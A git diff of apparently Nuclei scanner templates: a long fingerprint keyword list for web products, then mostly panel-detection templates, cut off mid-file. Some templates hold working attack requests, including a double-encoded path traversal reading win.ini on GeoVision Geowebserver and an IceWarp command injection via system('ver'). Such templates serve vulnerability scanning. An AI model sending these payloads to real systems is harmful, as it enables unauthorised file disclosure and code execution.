- - type: word name: xdoa-oa words: - 北京创信达科技有限公司 - - type: word condition: and name: xecure-vpn words: - xnstyle.css - xecure vpn manager - - type: word name: xecurevpn words: - xnstyle.css - - type: word name: xenapp words: - window.location="/citrix/xenapp" - - type: word name: xheditor words: - xheditor_lang/zh-cn.js - - type: word name: xheditor words: - class="xheditor - - type: word name: xheditor words: - .xheditor( - - type: word name: xhlis-oa words: - <title>杏和区域检验业务协同平台登录界面 - - type: word name: xiaomayi words: - /template/ant/css/anthomecomm.css - - type: word name: xiaonaodai words: - http://stat.xiaonaodai.com/stat.php - - type: word name: xinhaisoft-system words: - 北京心海导航教育科技股份有限公司-中国心理网版权所有
    - - type: word name: xinhaisoft-system words: - ../regist.asp?school= - - type: word name: xinnet-enterprise-mail words: - 北京新网数码信息技术有限公司 版权所有 - - type: word name: xinnet-mail words: - src="cgijson/getloginimg.php?img=logo - - type: word name: xinnet-mail words: - /webmail//cssv2/tamail.css - - type: word part: header name: xitami words: - "Server: xitami" - - type: word name: xiuno words: - xiuno/xiunobbs - - type: word name: xjhtqy-crm words: - class="hidden-xs ewheaderrow"> - - type: word name: xjhyt-system words: - class="wrap login_wrap" - - type: word name: xjhyt-system words: - url(images/yh.jpg) - - type: word name: xmall words: - xmadmin.exirck.cn - - type: word name: xoops words: - include/xoops.js - - type: word name: xpaper words: - src="template/paper/ - - type: word name: xtoa-oa words: - /app_qjuserinfo/qjuserinfoadd.jsp - - type: word name: xtoa-oa words: - /images/default/first/xtoa_logo.png - - type: word name: xtoa-oa words: - src="systemfiles/js/iawebclientactivexcheck.js" - - type: word name: xuanniao-traffic-management-platform words: - 玄鸟流量管理平台 - - type: word name: xunruicms words: - alt="xunruicms" - - type: word name: xxl-job words: - 分布式任务调度平台XXL-JOB - - type: word name: xycms words: - advfile/ad12.js - - type: word name: xyhcms words: - power by xyhcms - - type: word name: yabb words: - yabbtime.gettime() - - type: word name: yabb words: - /yabb.js - - type: word name: yadongsoft-fs3 words: - 神盾fs3文档安全共享系统v2.0 - + - type: word + condition: and + name: yapi + words: + - YApi + - 可视化接口管理平台 - type: word name: yearning words: - id=subnet - - type: word name: yelala words: - /public/js/knockout-3.4.1.debug.js - - type: word name: yelala words: - '' - - type: word name: yfidea-oa words: - background="oa/images/index/oalogin.jpg" - - type: word name: yichao-crmreporting words: - href="/css/vendors~index.acfeb.css" - - type: word name: yichao-system words: - src="amy/webos/jpmanager.js" - - type: word name: yii-framework words: - get started with yii - - type: word name: yioks-campus-football-management-platform words: - - - type: word name: yiqi-cms words: - content="yiqicms - - type: word name: yirui-iras words: - /authjsp/login.jsp - - type: word name: yirui-iras words: - fe0174bb-f093-42af-ab20-7ec621d10488 - - type: word condition: and name: yiyu-opms words: - opms - opms管理系统,织蝶-企业应用系统为您的企业保驾护航 - - type: word name: yizhitong-e7 words: - name="hidden_isbiaozhun" - - type: word name: ymail-optical-content-reading words: - /ymail/default/js/menu.js - - type: word name: ymhome-oa words: - /yimioa.apk - - type: word name: yonyou-ism words: - sheight*window.screen.deviceydpi - - type: word name: yonyou-erp words: - login_main_bg - - type: word name: yonyou-erp words: - login_owner - - type: word name: yonyou-erp-nc words: - /nc/servlet/nc.ui.iufo.login.index - - type: word condition: and name: yonyou-fe words: - v_hedden - v_show - - type: word name: yonyou-grp-u8 words: - window.location.replace("login.jsp?up=1") - - type: word name: yonyou-intelligentplant words: - /modules/core/client/views/sidemenu.client.view.html - - type: word name: yonyou-ksoa words: - onmouseout="this.classname='btn btnoff'" - - type: word name: yonyou-rmis words: - href="clientfile/rmisupdate.exe - - type: word name: yonyou-seeyon-oa words: - /seeyon/USER-DATA/IMAGES/LOGIN/login.gif - - type: word name: yonyou-seeyon-oa words: - /seeyon/common/ - - type: word name: yonyou-seeyon-oa words: - M3 Server - - type: word name: yonyou-seeyon-oa words: - M1-Server - - type: word name: yonyou-seeyon-oa words: - /seeyon/user-data/images/login/login.gif - - type: word condition: and name: yonyou-seeyon-oa words: - seeyon - seeyonproductid - - type: word name: yonyou-seeyon-oa words: - var _ctxpath = '/seeyon' - - type: word name: yonyou-seeyon-oa words: - a8-v5企业版 - - type: word name: yonyou-seeyon-oa words: - /seeyon/ - - type: word name: yonyou-shop words: - url:"/shophome/ajaxgetcompetemessagelist.action", - - type: word name: yonyou-shop words: - $.post("/shopfront/shoppingcar/gotoshoppingcartajax.action",function(data){ - - type: word name: yonyou-shop words: - 北京用友政务软件股份有限公司 - - type: word name: yonyou-turbocrm words: - turboui.js - - type: word name: yonyou-u8 words: - getfirstu8accid - - type: word name: yonyou-u8-cloud words: - 开启u8 cloud云端之旅 - - type: word name: yonyou-uclient words: - http-equiv=refresh content=0;url=index.jsp - - type: word name: yonyou-ufida words: - /system/login/login.asp?appid= - - type: word condition: and name: yonyou-ufida-nc words: - ufida_iufo_over.png - ufida_nc.png - - type: word condition: and name: yonyou-ufida-nc words: - logo/images/ - ufida - - type: word name: yonyou-ufida-nc words: - logo/images/ufida_nc.png - - type: word name: yonyou-ufida-nc words: -
    - - type: word name: yonyou-ufida-nc words: -
    驭龙 - - type: word name: yulong-hids words: -

    yulong - a cool hids system.

    - - type: word name: yunanbao-yunxz words: - 'id=mtokenplugin width=0 height=0 style="position: absolute;left: 0px; top: 0px"' - - type: word name: yuneasy-ipcalling words: - 云翌ip呼叫中心 - - type: word name: yunec words: - href="/17rec.html" - - type: word name: yunhezi words: - ui/js/seaconfig.js - - type: word name: yunhezi words: - ui/skins/black/style.css - - type: word name: yunhezi words: - class="client-list dm-clear"> - - type: word name: yunkemail words: - action="/alimail/error/browserlog - - type: word name: yunkemail words: - content="阿里企业邮箱 - - type: word name: yunsuo words: - href="http://bbs.yunsuo.com.cn - - type: word name: yunsuo words: - - - type: word name: zhongshengsoft-crm words: - clientutil.isff=!clientutil.isie - - type: word name: zhongshengsoft-crm words: - alert("餐厅编号不能为空") - - type: word name: zhongtan-ndstart words: - var pubnewsarray - - type: word name: zhongtan-ndstart words: - "南大之星信息发布系统 " - - type: word name: zhongyou-system words: - background=zhongyou.jpg - - type: word name: zhongyou-system words: - 众友科技巡检管理软件 - - type: word name: zhu-ji-bao words: - 您访问的是主机宝服务器默认页 - - type: word name: zhu-ji-bao words: - <a href="http://z.admin5.com/" target= - - type: word name: zhuofansoft-cms words: - session.infocss.infocssurl - - type: word name: zidesoft-e6 words: - src="/static/images/login/btn-login.gif" - - type: word name: ziguanghuayu-attendance-management-system words: - 广州紫光华宇信息技术有限公司 - - type: word name: zimbra words: - ImgZimbraIcon - - type: word part: header name: zimbra words: - "Set-Cookie: ZM_LOGIN_CSRF" - - type: word name: zimbra words: - window._zimbramail - - type: word name: zimbra words: - content="zimbra - - type: word name: zipkin words: - <base href="/zipkin/"> - - type: word name: zizhujianzhan words: - content="模板系统xinnet - - type: word name: zizhujianzhan words: - href="msnim:chat?contact=xinnet@hotmail.com - - type: word name: zknet-attendance-management words: - 'onclick="showstate(gettext(''forgotten password'')) ' - - type: word condition: and name: zknet-attendance-management words: - zknet - zksoftware inc. - - type: word name: zknet-attendance-management words: - web考勤管理系统 - - type: word condition: and name: zkteco-security-management-system words: - src='/login/images/zksecurity.png' - 百傲瑞达 - - type: word condition: and name: zkteco-security-management-system words: - class="login-finger-btn disabled" - id="password_hidden" - - type: word name: zkteco-security-management-system words: - $(".copyright").text("copyright ? " + server_current_year + " zkteco co., ltd. all rights reserved"); - - type: word name: zkteco-system words: - class="m-btn zkgreen rnd" - - type: word name: zkwell-corrosion-monitoring-and-corrosion-protection-management-system words: - background-image:url(images/devicebg.jpg) - - type: word name: znv-digital-campus words: - list.asp?caseid= - - type: word name: zoneminder words: - zoneminder login - - type: word name: zonghousc-system words: - data-errormessage-value-missing="* 请录入用户名 - - type: word name: zonghousc-system words: - style/default/frui.css - - type: word name: zoom-search-engine words: - name="zoom_query" - - type: word name: zoommeeting words: - class="alert alert-success hideme zoom-newmessage" - - type: word part: header name: zope words: - "X-Powered-By: zope" - - type: word condition: and name: zotonic words: - /lib/js/apps/zotonic-1.0 - "powered by: zotonic" - - type: word name: zte-police-research-system words: - 深圳市中兴信息技术有限公司版权所有 - - type: word name: zte-police-research-system words: - src="img/gonanlogo.jpg - - type: word name: zuitu words: - help/zuitu.php - - type: word name: zxoa words: - obj.src = "createcheckcode.aspx?id"+strmath; - - type: word name: zxoa words: - name="button1" value="" onclick="javascript:return checkfrom();" id="button1" class="loginbtn" /> - - type: word name: zzcms words: - /inc/showuserlogin.php?style=h&t=math.random() - - type: word name: zzsmit-public-bicycle-management-system words: - href="/skins/bicycle/css/login.css" - - type: word name: zzzcms words: - Powered by <a href='http://zzzcms.com'>ZZZcms</a> - - type: word - name: bitwarden - words: - - <title page-title>Bitwarden Web Vault - - - type: word - name: OpenBSD relayd - part: header - words: - - "Server: OpenBSD httpd" - - - type: word - name: Hunchentoot - part: header - words: - - "Server: Hunchentoot" - - - type: word - name: weblate - words: - - Weblate - - - condition: and - - - type: word - name: Adobe Experience Manager (AEM) - part: header - words: - - "x-dispatcher:" - case-insensitive: true - -# digest: 4a0a00473045022100e28f74c69af652c367854dc369b14f824316aff2e7d606a11ce27b83eb00e079022036f335c41bb67fbbe860ec5a6e2152d9b99f836673aa2add3f6ebd7624f68097:922c64590222798bb761d5b6d8e72950 +# Enhanced by cs on 2022/02/08 diff --git a/poc/web/geovision-geowebserver-lfi-7595.yaml b/poc/web/geovision-geowebserver-lfi-7595.yaml index c0e7dbfcad..85d8f11be9 100644 --- a/poc/web/geovision-geowebserver-lfi-7595.yaml +++ b/poc/web/geovision-geowebserver-lfi-7595.yaml @@ -1,14 +1,21 @@ id: geowebserver-lfi info: - name: GeoVision Geowebserver 5.3.3 - LFI + name: GeoVision Geowebserver 5.3.3 - Local File Inclusion author: madrobot severity: high - description: A vulnerability in GeoVision Geowebserver allows remote unauthenticated attackers to disclose the content of locally stored files. - reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt - tags: geowebserver,lfi + description: GeoVision Geowebserver 5.3.3 allows remote unauthenticated attackers to disclose the content of locally stored files via local file inclusion. + reference: + - https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 + metadata: + max-request: 2 + tags: packetstorm,geowebserver,lfi -requests: +http: - method: GET path: - "{{BaseURL}}/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini" @@ -16,7 +23,6 @@ requests: matchers-condition: and matchers: - - type: word words: - "bit app support" @@ -28,3 +34,5 @@ requests: - type: status status: - 200 + +# digest: 4a0a00473045022100f45b58cb50c20c8912b69076ae6fa4986b3a7193d9cc107529d887259042b1b2022078b79722d240466325335caf4bc3aa3eaa0e66cb5029a48cd6e8724eaed456af:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/geovision-geowebserver-lfi-7596.yaml b/poc/web/geovision-geowebserver-lfi-7596.yaml index 85d8f11be9..08261363a2 100644 --- a/poc/web/geovision-geowebserver-lfi-7596.yaml +++ b/poc/web/geovision-geowebserver-lfi-7596.yaml @@ -1,21 +1,15 @@ id: geowebserver-lfi info: - name: GeoVision Geowebserver 5.3.3 - Local File Inclusion + name: GeoVision Geowebserver 5.3.3 - LFI author: madrobot severity: high - description: GeoVision Geowebserver 5.3.3 allows remote unauthenticated attackers to disclose the content of locally stored files via local file inclusion. + description: A vulnerability in GeoVision Geowebserver allows remote unauthenticated attackers to disclose the content of locally stored files. reference: - https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - metadata: - max-request: 2 - tags: packetstorm,geowebserver,lfi + tags: geowebserver,lfi -http: +requests: - method: GET path: - "{{BaseURL}}/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini" @@ -23,6 +17,7 @@ http: matchers-condition: and matchers: + - type: word words: - "bit app support" @@ -34,5 +29,3 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100f45b58cb50c20c8912b69076ae6fa4986b3a7193d9cc107529d887259042b1b2022078b79722d240466325335caf4bc3aa3eaa0e66cb5029a48cd6e8724eaed456af:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/git-web-interface.yaml b/poc/web/git-web-interface.yaml index c8e8b1510a..6d2e37d689 100644 --- a/poc/web/git-web-interface.yaml +++ b/poc/web/git-web-interface.yaml @@ -4,11 +4,12 @@ info: name: Git web interface author: dhiyaneshDK severity: low - tags: git metadata: - shodan-query: 'html:"git web interface version"' + max-request: 1 + shodan-query: html:"git web interface version" + tags: git,misconfig -requests: +http: - method: GET path: - '{{BaseURL}}' @@ -21,4 +22,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# digest: 4a0a004730450220577939a771c748bfce13ca8c0bb449122de3b0ad0628fcbb0a7b9cd5af6a43a8022100a8f9cb2504ba2b3d1e2af9c8de3c52da2a7358d674a71f0d21bd5eaa7acce872:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/hashicorp-consul-webgui-7896.yaml b/poc/web/hashicorp-consul-webgui-7896.yaml new file mode 100644 index 0000000000..e1601600b0 --- /dev/null +++ b/poc/web/hashicorp-consul-webgui-7896.yaml @@ -0,0 +1,32 @@ +id: hashicorp-consul-webgui +info: + name: HashiCorp Consul WebGUI Detection + author: c-sh0 + description: Detection of HashiCorp Consul WebGUI + severity: info + metadata: + shodan-query: http.title:"Consul by HashiCorp" + tags: consul,webserver,panel +requests: + - method: GET + path: + - "{{BaseURL}}/ui/" + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - 'Consul by HashiCorp' + - '%22%2C%22CONSUL_COPYRIGHT_URL%22%3A%22https%3A%2F%2Fwww.hashicorp.com%22' + condition: or + extractors: + - type: regex + part: body + group: 1 + regex: + - "CONSUL_VERSION:.*([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})" diff --git a/poc/web/hashicorp-consul-webgui-7898.yaml b/poc/web/hashicorp-consul-webgui-7898.yaml index 8ed14af7c9..a157a7fed6 100644 --- a/poc/web/hashicorp-consul-webgui-7898.yaml +++ b/poc/web/hashicorp-consul-webgui-7898.yaml @@ -3,8 +3,8 @@ id: hashicorp-consul-webgui info: name: HashiCorp Consul WebGUI Detection author: c-sh0 - severity: info description: Detection of HashiCorp Consul WebGUI + severity: info metadata: shodan-query: http.title:"Consul by HashiCorp" tags: consul,webserver,panel diff --git a/poc/web/honeywell-web-controller-7996.yaml b/poc/web/honeywell-web-controller-7996.yaml deleted file mode 100644 index 332d7dc804..0000000000 --- a/poc/web/honeywell-web-controller-7996.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: honeywell-web-controller - -info: - name: Honeywell XL Web Controller - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/7130 - tags: panel - -requests: - - method: GET - path: - - '{{BaseURL}}/standard/default.php' - - matchers-condition: and - matchers: - - type: word - words: - - 'Honeywell XL Web Controller' - - - type: status - status: - - 200 diff --git a/poc/web/honeywell-web-controller.yaml b/poc/web/honeywell-web-controller.yaml index 1386c6d5d6..332d7dc804 100644 --- a/poc/web/honeywell-web-controller.yaml +++ b/poc/web/honeywell-web-controller.yaml @@ -1,21 +1,13 @@ id: honeywell-web-controller info: - name: Honeywell Excel Web Control Login Panel - Detect + name: Honeywell XL Web Controller author: dhiyaneshDK severity: info - description: Honeywell Excel Web Control login panel was detected. - reference: - - https://www.exploit-db.com/ghdb/7130 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - tags: edb,panel + reference: https://www.exploit-db.com/ghdb/7130 + tags: panel -http: +requests: - method: GET path: - '{{BaseURL}}/standard/default.php' @@ -29,5 +21,3 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502201cbade7e116f5a6461bc8f3247e57465c275928dd32e107dcd2fcef5007499e7022100a8805580e290eb54e4b1ce219ce329feda9ac13b5bec74addc47220b44738d15:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/icewarp-webclient-rce-8133.yaml b/poc/web/icewarp-webclient-rce-8133.yaml deleted file mode 100644 index a7494e8328..0000000000 --- a/poc/web/icewarp-webclient-rce-8133.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: icewarp-webclient-rce -info: - name: IceWarp WebClient RCE - author: gy741 - severity: critical - reference: - - https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E - tags: icewarp,rce -requests: - - raw: - - | - POST /webmail/basic/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - _dlg[captcha][target]=system(\'ver\')\ - matchers-condition: and - matchers: - - type: word - words: - - "Microsoft Windows [Version" - part: body - - type: status - status: - - 302 diff --git a/poc/web/icinga-web-login-8134.yaml b/poc/web/icinga-web-login-8134.yaml new file mode 100644 index 0000000000..0ef7258a86 --- /dev/null +++ b/poc/web/icinga-web-login-8134.yaml @@ -0,0 +1,22 @@ +id: icinga-web-login + +info: + name: Icinga Web 2 Login + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Icinga+Web+2+Login%22 + tags: panel,icinga + +requests: + - method: GET + path: + - '{{BaseURL}}/authentication/login' + + matchers-condition: and + matchers: + - type: word + words: + - "Icinga Web 2 Login" + - type: status + status: + - 200 diff --git a/poc/web/icinga-web-login-8137.yaml b/poc/web/icinga-web-login-8137.yaml deleted file mode 100644 index 5602ac406b..0000000000 --- a/poc/web/icinga-web-login-8137.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: icinga-web-login - -info: - name: Icinga Web 2 Login - author: dhiyaneshDK - severity: info - metadata: - shodan-query: http.title:"Icinga Web 2 Login" - tags: panel,icinga - -requests: - - method: GET - path: - - '{{BaseURL}}/authentication/login' - - matchers-condition: and - matchers: - - type: word - words: - - "Icinga Web 2 Login" - - type: status - status: - - 200 diff --git a/poc/web/icinga-web-login.yaml b/poc/web/icinga-web-login.yaml index 4c7f3d265e..5602ac406b 100644 --- a/poc/web/icinga-web-login.yaml +++ b/poc/web/icinga-web-login.yaml @@ -1,20 +1,14 @@ id: icinga-web-login info: - name: Icinga Web 2 Login Panel - Detect + name: Icinga Web 2 Login author: dhiyaneshDK severity: info - description: Icinga Web 2 login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 metadata: - max-request: 1 shodan-query: http.title:"Icinga Web 2 Login" tags: panel,icinga -http: +requests: - method: GET path: - '{{BaseURL}}/authentication/login' @@ -24,9 +18,6 @@ http: - type: word words: - "Icinga Web 2 Login" - - type: status status: - 200 - -# digest: 4a0a00473045022100b93f1bc0afb3895ba775c85a240d2acb0a39e22f725c0e7d8e75ec71bf39e1aa022068d32d69ef34775c7343e9e5d1c9682834d4961df25a63fd9fb9019eb57eb7fe:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/iplanet-web-server-8190.yaml b/poc/web/iplanet-web-server-8190.yaml deleted file mode 100644 index 60f5c19673..0000000000 --- a/poc/web/iplanet-web-server-8190.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: iplanet-web-server -info: - name: Detect iPlanet Webserver Detection - author: pussycat0x - severity: info - tags: tech,webserver - metadata: - fofa-query: 'app="iPlanet-Web-Server,-Enterprise-Edition-4.1"' -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "iPlanet" - - type: status - status: - - 200 diff --git a/poc/web/iplanet-web-server-8191.yaml b/poc/web/iplanet-web-server-8191.yaml new file mode 100644 index 0000000000..78c1d984a9 --- /dev/null +++ b/poc/web/iplanet-web-server-8191.yaml @@ -0,0 +1,21 @@ +id: iplanet-web-server +info: + name: Detect iPlanet Webserver Detection + author: pussycat0x + severity: info + metadata: + fofa-query: app="iPlanet-Web-Server,-Enterprise-Edition-4.1" + tags: tech,webserver +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "iPlanet" + - type: status + status: + - 200 diff --git a/poc/web/iplanet-web-server.yaml b/poc/web/iplanet-web-server.yaml index 78c1d984a9..60f5c19673 100644 --- a/poc/web/iplanet-web-server.yaml +++ b/poc/web/iplanet-web-server.yaml @@ -3,9 +3,9 @@ info: name: Detect iPlanet Webserver Detection author: pussycat0x severity: info - metadata: - fofa-query: app="iPlanet-Web-Server,-Enterprise-Edition-4.1" tags: tech,webserver + metadata: + fofa-query: 'app="iPlanet-Web-Server,-Enterprise-Edition-4.1"' requests: - method: GET path: diff --git a/poc/web/keenetic-web-login-8442.yaml b/poc/web/keenetic-web-login-8442.yaml new file mode 100644 index 0000000000..0d24c5fc72 --- /dev/null +++ b/poc/web/keenetic-web-login-8442.yaml @@ -0,0 +1,19 @@ +id: keenetic-web-login +info: + name: Keenetic Web Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6817 + tags: panel +requests: + - method: GET + path: + - '{{BaseURL}}/login#goto=%2Fdashboard' + matchers-condition: and + matchers: + - type: word + words: + - 'Keenetic Web' + - type: status + status: + - 200 diff --git a/poc/web/keenetic-web-login-8443.yaml b/poc/web/keenetic-web-login-8443.yaml deleted file mode 100644 index bc9aba324b..0000000000 --- a/poc/web/keenetic-web-login-8443.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: keenetic-web-login - -info: - name: Keenetic Web Login - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6817 - tags: panel,keenetic - -requests: - - method: GET - path: - - '{{BaseURL}}/login#goto=%2Fdashboard' - - matchers-condition: and - matchers: - - type: word - words: - - 'Keenetic Web' - - type: status - status: - - 200 diff --git a/poc/web/microweber-detect-8863.yaml b/poc/web/microweber-detect-8863.yaml index 64a576d65e..25c567062d 100644 --- a/poc/web/microweber-detect-8863.yaml +++ b/poc/web/microweber-detect-8863.yaml @@ -3,10 +3,9 @@ info: name: Microweber Detect author: princechaddha severity: info - reference: - - https://github.com/microweber/microweber + reference: https://github.com/microweber/microweber metadata: - shodan-query: http.favicon.hash:780351152 + shodan-query: 'http.favicon.hash:780351152' tags: tech,microweber,oss requests: - method: GET diff --git a/poc/web/microweber-detect.yaml b/poc/web/microweber-detect.yaml index 25c567062d..52947ee5a2 100644 --- a/poc/web/microweber-detect.yaml +++ b/poc/web/microweber-detect.yaml @@ -1,22 +1,30 @@ id: microweber-detect + info: name: Microweber Detect author: princechaddha severity: info - reference: https://github.com/microweber/microweber + reference: + - https://github.com/microweber/microweber metadata: - shodan-query: 'http.favicon.hash:780351152' + max-request: 1 + shodan-query: http.favicon.hash:780351152 tags: tech,microweber,oss -requests: + +http: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word part: body words: - '"generator" content="Microweber" />' + - type: status status: - 200 + +# digest: 490a0046304402200d363b411e7ba5a9a8385045c6324b8b1e2ef7452bfefd53daa432ac4722c4f802200f8f8472e00aa021a7c47e526b5fdeeab111961625c1d715d9a7e550e1d948fa:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/microweber-xss.yaml b/poc/web/microweber-xss.yaml index e3b0bb3e84..70c7e8a91c 100644 --- a/poc/web/microweber-xss.yaml +++ b/poc/web/microweber-xss.yaml @@ -3,16 +3,17 @@ info: name: Microweber Cross-Site Scripting author: gy741 severity: high - description: Microweber prior to 1.2.11 is susceptible to reflected cross-site Scripting via Packagist microweber/microweber. + description: "Microweber prior to 1.2.11 is susceptible to reflected cross-site Scripting via Packagist microweber/microweber." reference: - https://github.com/microweber/microweber/issues/809 - https://github.com/microweber/microweber + metadata: + shodan-query: 'http.favicon.hash:780351152' classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 + cve-id: cwe-id: CWE-79 - metadata: - shodan-query: http.favicon.hash:780351152 tags: microweber,xss,oss requests: - method: GET diff --git a/poc/web/oracle-iplanet-web-server-9392.yaml b/poc/web/oracle-iplanet-web-server-9392.yaml new file mode 100644 index 0000000000..f7bb146ace --- /dev/null +++ b/poc/web/oracle-iplanet-web-server-9392.yaml @@ -0,0 +1,28 @@ +id: oracle-iplanet-web-server + +info: + name: Detect Oracle-iPlanet-Web-Server + author: pussycat0x + severity: info + metadata: + max-request: 1 + fofa-query: app="Oracle-iPlanet-Web-Server + tags: tech,oracle + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Oracle iPlanet Web Server" + + - type: status + status: + - 200 + +# digest: 490a004630440220609b86d9a84db9945e09cb7170deff3c55f1df6b010cdded85064fca20fc9360022078f76d7916e3d272d78ac746644df57c1c475b279aee3c0250c2c56f7756f4c4:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/oracle-iplanet-web-server.yaml b/poc/web/oracle-iplanet-web-server.yaml deleted file mode 100644 index 8bd76eabb4..0000000000 --- a/poc/web/oracle-iplanet-web-server.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: oracle-iplanet-web-server -info: - name: Detect Oracle-iPlanet-Web-Server - author: pussycat0x - severity: info - metadata: - fofa-query: app="Oracle-iPlanet-Web-Server - tags: tech,oracle -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Oracle iPlanet Web Server" - - type: status - status: - - 200 diff --git a/poc/web/r-webserver-login.yaml b/poc/web/r-webserver-login.yaml index 94dfe34794..5e2be9c394 100644 --- a/poc/web/r-webserver-login.yaml +++ b/poc/web/r-webserver-login.yaml @@ -1,19 +1,33 @@ id: r-webserver-login + info: - name: R WebServer Login + name: R WebServer Login Panel - Detect author: pussycat0x severity: info - reference: https://www.exploit-db.com/ghdb/7132 - tags: panel,rwebserver -requests: + description: R WebServer login panel was detected. + reference: + - https://www.exploit-db.com/ghdb/7132 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: edb,panel,rwebserver + +http: - method: GET path: - "{{BaseURL}}/" + matchers-condition: and matchers: - type: word words: - "R WebServer" + - type: status status: - 200 + +# digest: 490a00463044022065379692db243fa1d115f286378173a32b973de295c34e846b5c5ef0c3132dc50220658f791bd86e5cdfb9e31fdeb4d355ca18db17b33f97e7e6aa073bbbbdfda42a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/saia-web-server-info-9979.yaml b/poc/web/saia-web-server-info-9979.yaml index cdf7f8823b..36354a771d 100644 --- a/poc/web/saia-web-server-info-9979.yaml +++ b/poc/web/saia-web-server-info-9979.yaml @@ -3,7 +3,8 @@ info: name: Saia PCD Web-Server author: DhiyaneshDk severity: low - reference: https://www.exploit-db.com/ghdb/6865 + reference: + - https://www.exploit-db.com/ghdb/6865 tags: config,exposure requests: - method: GET diff --git a/poc/web/saia-web-server-info.yaml b/poc/web/saia-web-server-info.yaml new file mode 100644 index 0000000000..cdf7f8823b --- /dev/null +++ b/poc/web/saia-web-server-info.yaml @@ -0,0 +1,20 @@ +id: saia-web-server +info: + name: Saia PCD Web-Server + author: DhiyaneshDk + severity: low + reference: https://www.exploit-db.com/ghdb/6865 + tags: config,exposure +requests: + - method: GET + path: + - "{{BaseURL}}/loadtextfile.htm#programinfo" + matchers-condition: and + matchers: + - type: word + words: + - "Saia PCD Web Server" + part: body + - type: status + status: + - 200 diff --git a/poc/web/sap-netweaver-webgui.yaml b/poc/web/sap-netweaver-webgui.yaml deleted file mode 100644 index aa27e83989..0000000000 --- a/poc/web/sap-netweaver-webgui.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: sap-nw-webgui -info: - name: SAP NetWeaver WebGUI Detection - author: randomstr1ng - description: Detection of SAP NetWeaver ABAP Webserver WebGUI - severity: info - tags: sap,webserver -requests: - - method: GET - path: - - "{{BaseURL}}/sap/bc/gui/sap/its/webgui" - redirects: true - max-redirects: 2 - matchers: - - type: word - part: body - words: - - "sap-system-login" - - "Logon" - condition: or diff --git a/poc/web/sap-web-dispatcher-10078.yaml b/poc/web/sap-web-dispatcher-10078.yaml index cf5e1ad308..59a54042db 100644 --- a/poc/web/sap-web-dispatcher-10078.yaml +++ b/poc/web/sap-web-dispatcher-10078.yaml @@ -8,12 +8,11 @@ info: requests: - method: GET redirects: true - max-redirects: 5 + max-redirects: 2 path: - "{{BaseURL}}/inormalydonotexist" - matchers-condition: or matchers: - - type: regex + - type: word part: body - regex: - - "SAP Web Dispatcher" + words: + - "This error page was generated by SAP Web Dispatcher" diff --git a/poc/web/sap-web-dispatcher-admin-portal-10071.yaml b/poc/web/sap-web-dispatcher-admin-portal-10071.yaml new file mode 100644 